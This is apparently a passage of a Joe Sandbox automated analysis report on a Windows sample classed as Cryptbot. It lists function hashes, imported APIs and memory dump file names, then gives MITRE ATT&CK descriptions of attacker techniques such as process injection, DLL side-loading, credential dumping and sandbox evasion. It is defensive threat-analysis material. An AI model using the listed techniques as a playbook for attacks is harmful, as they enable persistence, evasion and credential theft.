Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: 997fffe0121cc2147859d3b02e7f24c06005b1283f973504a7fd99e895fabffa
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 4E4126B1A04215CBDB20DF19C4C4796B7E5AF88700F2982A9DCAC9F24AD332DD46DB90

Function 6C393080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C393101

Strings

NaN, xrefs: 6C393081

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: 1f2065a76adc9f937e59593ea1d80dced9f85468a19c96323d497f6a8b4abec6
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: A24126F1A056158BDB50DF18C480786B7F5AF85708B298299DC8C8F76AE332DC468F91

Function 6C414B80 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C414BBA
strlen.MSVCRT ref: 6C414C3D
strlen.MSVCRT ref: 6C414CC0
strlen.MSVCRT ref: 6C414D43

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: b7a36bca83fc5f0e92a0dd4815f08cf34b01fa1bdb37daa94aff29425faaea30
Instruction ID: 7e1929dba7aee8c3587298c9d7127f8f38fa00a7f142d951022c597fdab4e6f8
Opcode Fuzzy Hash: b7a36bca83fc5f0e92a0dd4815f08cf34b01fa1bdb37daa94aff29425faaea30
Instruction Fuzzy Hash: 6EE13A74A046058FC700DFACC180EAEBBF1EF45358B158A69E895DBB54E734E906CF81

Function 6C414380 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C4143BA
strlen.MSVCRT ref: 6C41443D
strlen.MSVCRT ref: 6C4144C0
strlen.MSVCRT ref: 6C414543

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6f8740151178adda0cd10313a953854c45d6fd068ec2b2888da8559d3f439963
Instruction ID: c2b3bd8764ee4d26060a25a9c5c085496af3bf17143fb21b6ff41907a195b8f6
Opcode Fuzzy Hash: 6f8740151178adda0cd10313a953854c45d6fd068ec2b2888da8559d3f439963
Instruction Fuzzy Hash: 22E13A74A086458FC700DFADC184EAEBBF1EF45358B148A69D8A5CBB54D734E906CF82

Function 6C39DFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C39DFAE
strlen.MSVCRT ref: 6C39DFC1

Strings

basic_string: construction from null is not valid, xrefs: 6C39DFE3

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: 336aaa7282c1ace555687e0a55875120755398fb8bd3275c45d298b598130abb
Instruction ID: ef861d15876d0db4e9e96e9b7cd60fbe681a0a72676c5d513e261ba81dec3e65
Opcode Fuzzy Hash: 336aaa7282c1ace555687e0a55875120755398fb8bd3275c45d298b598130abb
Instruction Fuzzy Hash: 8F110D72A092008F8710FF7ED84545EBBF1AB89224F45CA69D9888B709F635D4188FE3

Function 00CB2F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00CB2E97
fputc.MSVCRT ref: 00CB2F07
memset.MSVCRT ref: 00CB2FC2

Strings

o, xrefs: 00CB2F5E

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: 9e964a8b33dc24fbfcf810544618cbe4233f6be64720fa23090f9f5ee1dc865f
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: E2316872A00245CFCB10CF69C1807EABBF1BF48341F158A19D999AB701E734EE40CB80

Function 6C393616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C393567
fputc.MSVCRT ref: 6C3935D7
memset.MSVCRT ref: 6C393692

Strings

o, xrefs: 6C39362E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: c12160f0194ae63edc72ca8bb72a3e2ac60468b8ae62b4f1b80f15ba6a702af1
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: 2A3132B2A082058FCB40CF68C1807AABBF1BF48354F158A59E98DABB01F735E905CF50

Function 00CB3424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00CB338F
fputc.MSVCRT ref: 00CB33F1

Strings

@, xrefs: 00CB342A

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 315c61b38955f68d020fcbd3122be415ac7b1cd214804308af984adb44c704e7
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 4B114CB1A042808BCB15CF69C1C47EA7BE1BF84300F258558DD999F26ADB34EE06CB44

Function 6C393AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C393A5F
fputc.MSVCRT ref: 6C393AC1

Strings

@, xrefs: 6C393AFA

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 743f7a77b6a8845ce78a47df0e248643e48c6f31d85b3bacef3b4ce97622c5ce
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: 6511F6F1A092008BDB40CF28C180789BBB2BB49318F258659ED9D6FB4AE335E801CF55

Function 00CB18B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00CB191E

Strings

Unknown error, xrefs: 00CB18B2
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00CB18FF

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 1d6100490f5bfb7af3605b1304582c679baf68172c07f0e1fe9ab149747429e1
Instruction ID: e9953ddd8f8b73c5b263aeb9486062d198e6d10090ff6baca651c00882e2b8d3
Opcode Fuzzy Hash: 1d6100490f5bfb7af3605b1304582c679baf68172c07f0e1fe9ab149747429e1
Instruction Fuzzy Hash: DE01C0B0408B45CBD740AF15E48845ABFF1FF8A350F868898E5C846269CB3298A8C743

Function 00CB6B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,00CB6C81,?,?,?,?,?,?,00000000,00CB4F24), ref: 00CB6B87
InitializeCriticalSection.KERNEL32(?,?,?,?,00CB6C81,?,?,?,?,?,?,00000000,00CB4F24), ref: 00CB6BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,00CB6C81,?,?,?,?,?,?,00000000,00CB4F24), ref: 00CB6BD0
EnterCriticalSection.KERNEL32(?,?,?,?,00CB6C81,?,?,?,?,?,?,00000000,00CB4F24), ref: 00CB6BF8

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: a0fc1c2905252e70121fa91e21a12f68d50625e7939c48c1aa7ae1ae22243b21
Instruction ID: 394c001426bd6caf387baa2d31fd23d8ba7abc9e0f2b51d61f3b367f2ea8f103
Opcode Fuzzy Hash: a0fc1c2905252e70121fa91e21a12f68d50625e7939c48c1aa7ae1ae22243b21
Instruction Fuzzy Hash: 02111BB15081008BDB14BB3CE9C63AEBBB4EB00300F550A29D883C7215F639E984EB96

Function 6C398080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C3981A1), ref: 6C3980A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C3981A1), ref: 6C3980E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C3981A1), ref: 6C3980F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C3981A1), ref: 6C398118

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: db1094319a7225902114054fdfa4ae6e7a08d1f2ab742ae52c0d5a3b452dc4de
Instruction ID: b06d3b9a39097898fa6ad9409b559e68a71527554189729d1c0ec85717bfa3ee
Opcode Fuzzy Hash: db1094319a7225902114054fdfa4ae6e7a08d1f2ab742ae52c0d5a3b452dc4de
Instruction Fuzzy Hash: D8111EF160A1018ADF10FBACA48669E7FB4EB96318F510926C542CB71CF633D494CAD3

Function 00CB2000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00CB21D3,?,?,?,?,?,00CB17E8), ref: 00CB200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00CB21D3,?,?,?,?,?,00CB17E8), ref: 00CB2035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00CB21D3,?,?,?,?,?,00CB17E8), ref: 00CB203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00CB21D3,?,?,?,?,?,00CB17E8), ref: 00CB205C

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 711f9dec8a8afa8f0e25f33770bf7b2de6563a20ff5e6412933e2d263a761fde
Instruction ID: 7f9c7d349b6ded8585462d4390e5ff90b6b78be4121ce37af92338ec9505793f
Opcode Fuzzy Hash: 711f9dec8a8afa8f0e25f33770bf7b2de6563a20ff5e6412933e2d263a761fde
Instruction Fuzzy Hash: FCF08CB65003118FDB10BF78A88469EBBB8AB14740F050628DDA987215E735A906CBA2

Function 6C38AB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C38AB5E
TlsGetValue.KERNEL32 ref: 6C38AB85
GetLastError.KERNEL32 ref: 6C38AB8C
LeaveCriticalSection.KERNEL32 ref: 6C38ABAC

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: bb1ae1e9d8ea2d9999a17e615a215b9b1352acc97f563cc0af1e08bd0625e4d7
Instruction ID: b6d7721bbb69c851e005d0943e9be195283b98d6d1d6c0d8a1baa87f8fb7d80d
Opcode Fuzzy Hash: bb1ae1e9d8ea2d9999a17e615a215b9b1352acc97f563cc0af1e08bd0625e4d7
Instruction Fuzzy Hash: 87F0F4B2A093018FDB00FFB9E4C590E7F74EA55654B050568DD444B30CE632A809CBA3

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

